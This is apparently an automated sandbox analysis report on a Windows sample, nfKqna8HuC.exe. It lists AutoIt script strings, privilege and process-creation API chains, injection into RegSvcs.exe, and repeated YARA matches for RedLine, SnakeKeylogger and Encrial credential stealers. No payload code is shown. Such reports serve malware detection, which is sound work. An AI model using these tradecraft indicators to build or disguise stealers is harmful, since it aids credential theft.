                Source: nfKqna8HuC.exe, 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: eSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_44aeecd7-c
                Source: nfKqna8HuC.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_97660607-4
                Source: nfKqna8HuC.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_64025dcc-7
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00666606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00666606
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0065ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0065ACC5
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006679D3
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0064B0430_2_0064B043
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006332000_2_00633200
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0065410F0_2_0065410F
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006402A40_2_006402A4
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0062E3B00_2_0062E3B0
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0065038E0_2_0065038E
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0065467F0_2_0065467F
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006406D90_2_006406D9
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0068AACE0_2_0068AACE
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00654BEF0_2_00654BEF
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0064CCC10_2_0064CCC1
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0062AF500_2_0062AF50
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00626F070_2_00626F07
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0063B11F0_2_0063B11F
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006831BC0_2_006831BC
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0064D1B90_2_0064D1B9
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0065724D0_2_0065724D
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0064123A0_2_0064123A
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006293F00_2_006293F0
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006613CA0_2_006613CA
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0063F5630_2_0063F563
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006296C00_2_006296C0
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0066B6CC0_2_0066B6CC
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0068F7FF0_2_0068F7FF
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006277B00_2_006277B0
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006579C90_2_006579C9
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0063FA570_2_0063FA57
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00629B600_2_00629B60
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00633B700_2_00633B70
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00627D190_2_00627D19
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0063FE6F0_2_0063FE6F
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00649ED00_2_00649ED0
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00627FA30_2_00627FA3
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_014DFFB00_2_014DFFB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00408C602_2_00408C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040DC112_2_0040DC11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00407C3F2_2_00407C3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00418CCC2_2_00418CCC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00406CA02_2_00406CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004028B02_2_004028B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004182442_2_00418244
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004016502_2_00401650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F202_2_00402F20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004193C42_2_004193C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004187882_2_00418788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F892_2_00402F89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402B902_2_00402B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004073A02_2_004073A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02A314382_2_02A31438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02A314482_2_02A31448
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02A311A82_2_02A311A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_03028D702_2_03028D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_030230302_2_03023030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0302BA822_2_0302BA82
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0302B8282_2_0302B828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_030222B02_2_030222B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_03028D602_2_03028D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0302F3902_2_0302F390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_030230202_2_03023020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0302B8182_2_0302B818
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: String function: 00646AC0 appears 42 times
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: String function: 0064F8A0 appears 35 times
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: String function: 0063EC2F appears 68 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
                Source: nfKqna8HuC.exe, 00000000.00000003.2062725234.0000000003E3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nfKqna8HuC.exe
                Source: nfKqna8HuC.exe, 00000000.00000002.2064042860.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs nfKqna8HuC.exe
                Source: nfKqna8HuC.exe, 00000000.00000003.2056531512.0000000003C93000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nfKqna8HuC.exe
                Source: nfKqna8HuC.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.nfKqna8HuC.exe.1ff0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.2064042860.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
